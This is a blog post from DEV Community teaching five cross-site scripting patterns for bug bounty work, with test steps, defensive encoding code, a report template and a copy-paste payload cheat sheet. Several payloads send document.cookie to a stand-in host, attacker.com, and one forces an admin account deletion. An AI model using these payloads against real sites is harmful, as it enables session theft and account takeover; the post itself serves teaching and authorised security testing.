DEV Community

Kai Learner

The XSS Patterns Hackers Use (And How to Spot Them)

XSS — Cross-Site Scripting — has been the #1 web vulnerability in bug bounty programs for years running. Not because it's exotic or clever, but because developers keep making the same five mistakes. Learn to recognize those mistakes, and you can both harden your own apps and earn real money finding them in other people's.

This article covers the five XSS patterns that actually show up in bug bounties, how to test for each one in under 30 seconds, and how to write a report that gets paid.


Why XSS Is Still Everywhere in 2026

You'd think sanitizing user input would be table stakes by now. It is — in theory. In practice:

  • Teams move fast and add new input fields without security review
  • Third-party components introduce vectors the original team didn't write
  • SPAs moved rendering to the client, where developers assume server-side protections still apply
  • Developers sanitize for one context (HTML) and forget another (JavaScript, URLs, attributes)

The result: XSS findings are still being paid out weekly on every major bug bounty platform.


Pattern 1: Reflected XSS — The Simplest Attack

What's happening: User input is taken from a URL parameter or form field and written directly into the HTML response without encoding.

https://example.com/search?q=<script>alert('xss')</script>

If the page renders "You searched for: <script>alert('xss')</script>" as raw HTML rather than escaped text, you have reflected XSS.

How to test (30 seconds)

  1. Find any input that's echoed back on the page — search bars, error messages, username displays
  2. Inject: "><svg onload="alert(1)">
  3. Check the HTML source (not the rendered page — browsers can hide it)
  4. If your tag appears unescaped, it's vulnerable
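The underlying fix is output encoding before the value reaches the page. A minimal sketch in plain Node (escapeHtml and the render helpers are hypothetical names, not from any framework):

```javascript
// Vulnerable: interpolates the query parameter straight into HTML.
function renderSearchUnsafe(q) {
  return `<p>You searched for: ${q}</p>`;
}

// Fixed: HTML-encode the five significant characters first.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSearchSafe(q) {
  return `<p>You searched for: ${escapeHtml(q)}</p>`;
}

const payload = "<script>alert('xss')</script>";
renderSearchUnsafe(payload); // output contains a live <script> tag
renderSearchSafe(payload);   // output contains &lt;script&gt; -- inert text
```

Note that & must be replaced first, or the later entities would be double-encoded.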

Real finding

An e-commerce site passed a category filter into a template engine without encoding:

GET /products?category="><img src=x onerror="fetch('https://attacker.com/'+document.cookie)">

The request was logged to an admin dashboard and rendered raw. Every admin who opened the logs had their session cookie exfiltrated. (Strictly speaking this is blind XSS — the entry point was a reflected parameter, but the payload fired later in a different context.) $300 bounty.

Impact

Reflected XSS requires the victim to click a crafted link — usable for phishing, session hijacking, and credential theft. Lower severity than stored, but still pays.


Pattern 2: Stored XSS — Persistent and Paid Better

What's happening: User input is saved to a database and displayed to other users without sanitization.

Comment sections, user bios, product reviews, ticket subjects — anything saved and later rendered.

How to test

  1. Find a form that saves input and displays it to others
  2. Submit: <svg onload="alert(document.domain)">
  3. Load the page where the content appears
  4. If the alert fires, it's stored XSS

More complete test payload:

<img src=x onerror="new Image().src='https://attacker.com/steal?c='+document.cookie">

Real finding

A review platform stored ratings with an unsafe template:

<p>Review: <%= user_review %></p>

Submitting the following in the review field caused every admin who viewed it to silently fire a privileged action:

</p><script>
  fetch('/admin/delete-account?userId=' + currentUserId, {credentials: 'include'});
</script><p>

$500 bounty. Stored XSS pays more because it affects every user who views the page — no social engineering required.
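The remediation mirrors Pattern 1: store the raw review, but escape it at render time. A sketch (escapeHtml and renderReview are hypothetical helpers, not part of any particular template engine):

```javascript
// HTML-encode the five significant characters; & goes first.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Safe equivalent of the review template above: encoding happens
// on output, so the stored data stays intact and every later
// rendering context gets a clean value.
function renderReview(userReview) {
  return `<p>Review: ${escapeHtml(userReview)}</p>`;
}

renderReview('</p><script>alert(1)</script><p>');
// -> the injected tags come out as &lt;script&gt; -- inert text
```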


Pattern 3: DOM-Based XSS — JavaScript's Blind Spot

What's happening: Client-side JavaScript reads user-controlled input (URL fragment, query param, localStorage) and writes it to the DOM without sanitization.

// Vulnerable
const params = new URLSearchParams(window.location.search);
document.getElementById('results').innerHTML = `Results for: ${params.get('q')}`;

Server-side WAFs and output encoding don't catch this — the server never sees the payload.
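The client-side fix is to stop using innerHTML for plain text. A sketch of the safe version, written as a pure function over a node-like object so it runs outside a browser (in a real page, el would be document.getElementById('results')):

```javascript
// Assigning textContent instead of innerHTML means the query is
// never parsed as markup, so any tags in it stay inert text.
function renderResults(el, q) {
  el.textContent = `Results for: ${q}`;
}

// Stand-in for a real DOM element:
const el = { textContent: '' };
renderResults(el, '"><img src=x onerror="alert(1)">');
// el.textContent now holds the payload as a literal string
```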

How to test

  1. Open DevTools → Sources → search for .innerHTML, .outerHTML, document.write, insertAdjacentHTML
  2. Trace where the input comes from — is any of it user-controlled?
  3. Test with: #"><img src=x onerror="alert(1)">
  4. Check if it renders

Real finding

A React app used dangerouslySetInnerHTML to render a user-supplied search highlight:

// Component rendered this:
<span dangerouslySetInnerHTML={{ __html: highlight }} />

highlight came from a URL param. Test URL:

/search?q=test&highlight=<img src=x onerror="alert(document.cookie)">

$400 bounty. DOM XSS is often missed because developers assume the risk is server-side.


Pattern 4: Filter Bypass — When the "Fix" Doesn't Work

What's happening: The developer added filtering, but it's incomplete. This is the pattern that separates casual testing from actual bug bounty findings.

Common broken filters and bypasses

| Filter | Bypass |
| --- | --- |
| Blocks `<script>` | `<img src=x onerror="alert(1)">` |
| Blocks `<script>` (case-sensitive) | `<Script>alert(1)</Script>` |
| Strips `javascript:` | `<a href="jAvAsCrIpT:alert(1)">click</a>` |
| Strips `javascript:` | `<a href="java&#9;script:alert(1)">` (tab character) |
| Blocks quotes | `<img src=x onerror=alert(String.fromCharCode(88,83,83))>` |
| Strips event handlers | `<svg><animate onbegin="alert(1)" dur="1s">` |
| Encodes `<` `>` but not inside attributes | `" onmouseover="alert(1)` |

How to test

  1. Identify what the filter removes or encodes (test with <script>alert(1)</script> first)
  2. Try event handlers: onerror, onload, onmouseover, onfocus, onbegin
  3. Try encoding: HTML entities (&#60;), URL encoding (%3C), Unicode
  4. Try whitespace tricks: tab (&#9;), newline (&#10;) inside attributes
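To see why step 2 works so often, here is the kind of naive filter this pattern describes (hypothetical, but representative of real findings):

```javascript
// Strips literal <script> tags and nothing else -- a common
// "fix" that only blocks the one payload the developer tested.
function naiveFilter(input) {
  return input.replace(/<\/?script>/gi, '');
}

naiveFilter('<script>alert(1)</script>');      // -> 'alert(1)' (blocked)
naiveFilter('<img src=x onerror="alert(1)">'); // unchanged (bypassed)
```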

Real finding

A chat application stripped <script> but allowed other HTML:

<img src=x onerror="this.src='https://attacker.com/log?c='+encodeURIComponent(document.cookie)">

Every message containing this string silently phoned home. $350 bounty.


Pattern 5: Context Confusion — Right Payload, Wrong Place

What's happening: The developer sanitizes for one context but the input ends up in another. This is why the same htmlspecialchars() call that protects HTML output doesn't protect a JavaScript string.

The four contexts and what can go wrong

HTML context — input rendered between tags:

<p>Hello, <%= username %></p>

Fix: HTML-encode < > " ' &. Forget it and <script> executes.

Attribute context — input inside an HTML attribute:

<input value="<%= username %>">

Fix: HTML-encode AND ensure the attribute is quoted. Without quotes, x onmouseover=alert(1) works even without <>.
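The unquoted-attribute problem can be shown in a few lines (escapeAttr and the render helpers are hypothetical names):

```javascript
// Minimal attribute-escaping helper: encode & and " so a quoted
// value cannot be broken out of.
function escapeAttr(v) {
  return v.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

function renderUnquoted(v) { return `<input value=${v}>`; }
function renderQuoted(v)   { return `<input value="${escapeAttr(v)}">`; }

renderUnquoted('x onmouseover=alert(1)');
// -> <input value=x onmouseover=alert(1)>   (attribute smuggled in)
renderQuoted('x onmouseover=alert(1)');
// -> <input value="x onmouseover=alert(1)"> (just a harmless value)
```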

JavaScript context — input embedded in a script block:

<script>var name = "<%= username %>";</script>

Fix: JavaScript-escape (not HTML-encode). </script><script>alert(1) breaks out of the string entirely.
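One safe pattern here (a sketch, not the only correct approach): serialize with JSON.stringify, then neutralize < so a literal </script> can never appear inside the string. jsStringLiteral and buildScript are hypothetical names:

```javascript
// JSON.stringify handles quotes and backslashes; replacing "<"
// prevents a literal </script> from ending the script block early.
function jsStringLiteral(value) {
  return JSON.stringify(value).replace(/</g, '\\u003c');
}

function buildScript(username) {
  return `<script>var name = ${jsStringLiteral(username)};</script>`;
}

buildScript('</script><script>alert(1)');
// the embedded </script> becomes \u003c/script> -- inert inside the string
```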

URL context — input used in an href or src:

<a href="<%= redirectUrl %>">Back</a>

Fix: Validate against an allowlist. javascript:alert(1) is a valid URL that executes on click.
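A sketch of allowlist validation using the standard URL constructor (safeHref is a hypothetical helper; the protocol check is the important part):

```javascript
// Parse the value and allow only http/https. The URL parser
// lowercases the scheme and strips tabs/newlines before parsing,
// which also defeats the jAvAsCrIpT: and tab tricks from Pattern 4.
function safeHref(input, base = 'https://example.com/') {
  try {
    const url = new URL(input, base);
    return ['http:', 'https:'].includes(url.protocol) ? url.href : '#';
  } catch {
    return '#'; // unparseable input never reaches the href
  }
}

safeHref('/account');            // resolved against base -- allowed
safeHref('javascript:alert(1)'); // -> '#'
safeHref('jAvAsCrIpT:alert(1)'); // -> '#'
```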

How to test

When you find input reflected somewhere, identify the context before choosing the payload. A payload that works in HTML context will fail in JS context, and vice versa.


How to Write a Bug Bounty Report That Gets Paid

Finding the XSS is half the work. A vague report gets triaged down or rejected.

Good structure:

**Title:** Stored XSS in user bio field allows session hijacking

**Severity:** High (CVSS 7.2)

**Steps to reproduce:**
1. Log in to the application
2. Navigate to Profile → Edit Bio
3. Enter the following in the bio field:
   <svg onload="alert(document.domain)">
4. Save the profile
5. Visit the profile page as any other user
6. The alert fires with the domain

**Impact:**
An attacker can inject arbitrary JavaScript that executes in the context of 
any user who views the profile. Practical impact: session token theft via 
document.cookie, forced actions using the victim's credentials, redirection 
to phishing pages.

**Proof of concept:** [screenshot of alert firing]

**Remediation:** HTML-encode all user-supplied content before rendering.
Apply a Content Security Policy to limit script execution.

What makes reports get paid:

  • Exact reproduction steps that work first time
  • A screenshot or video of the exploit firing
  • Clear impact statement — what can an attacker actually do?
  • Remediation suggestion

XSS Payload Cheat Sheet

Quick reference — copy, paste, test:

# Basic probes
<script>alert(1)</script>
<svg onload="alert(1)">
"><img src=x onerror="alert(1)">
'><img src=x onerror='alert(1)'>

# Attribute escapes (no < > needed)
" onmouseover="alert(1) x="
' onfocus='alert(1)' autofocus='

# Filter bypasses
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<svg><animate onbegin="alert(1)" dur="1s">

# Without quotes
<img src=x onerror=alert(String.fromCharCode(88,83,83))>

# Data exfil (replace attacker.com)
<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
<script>new Image().src='https://attacker.com/?c='+document.cookie</script>

Where to Start

  1. Set up a free account on a bug bounty platform such as Intigriti
  2. Pick a target with a VDP (Vulnerability Disclosure Program) — these are explicitly legal to test and less competitive, though usually unpaid
  3. Find any input field, run through the five patterns above
  4. Document everything with screenshots before reporting

First finding is the hardest. After that, the patterns repeat.


This article was written with AI assistance. All code examples represent real vulnerability patterns — test only on systems you have permission to test.


Tags: security bugbounty webdev xss cybersecurity
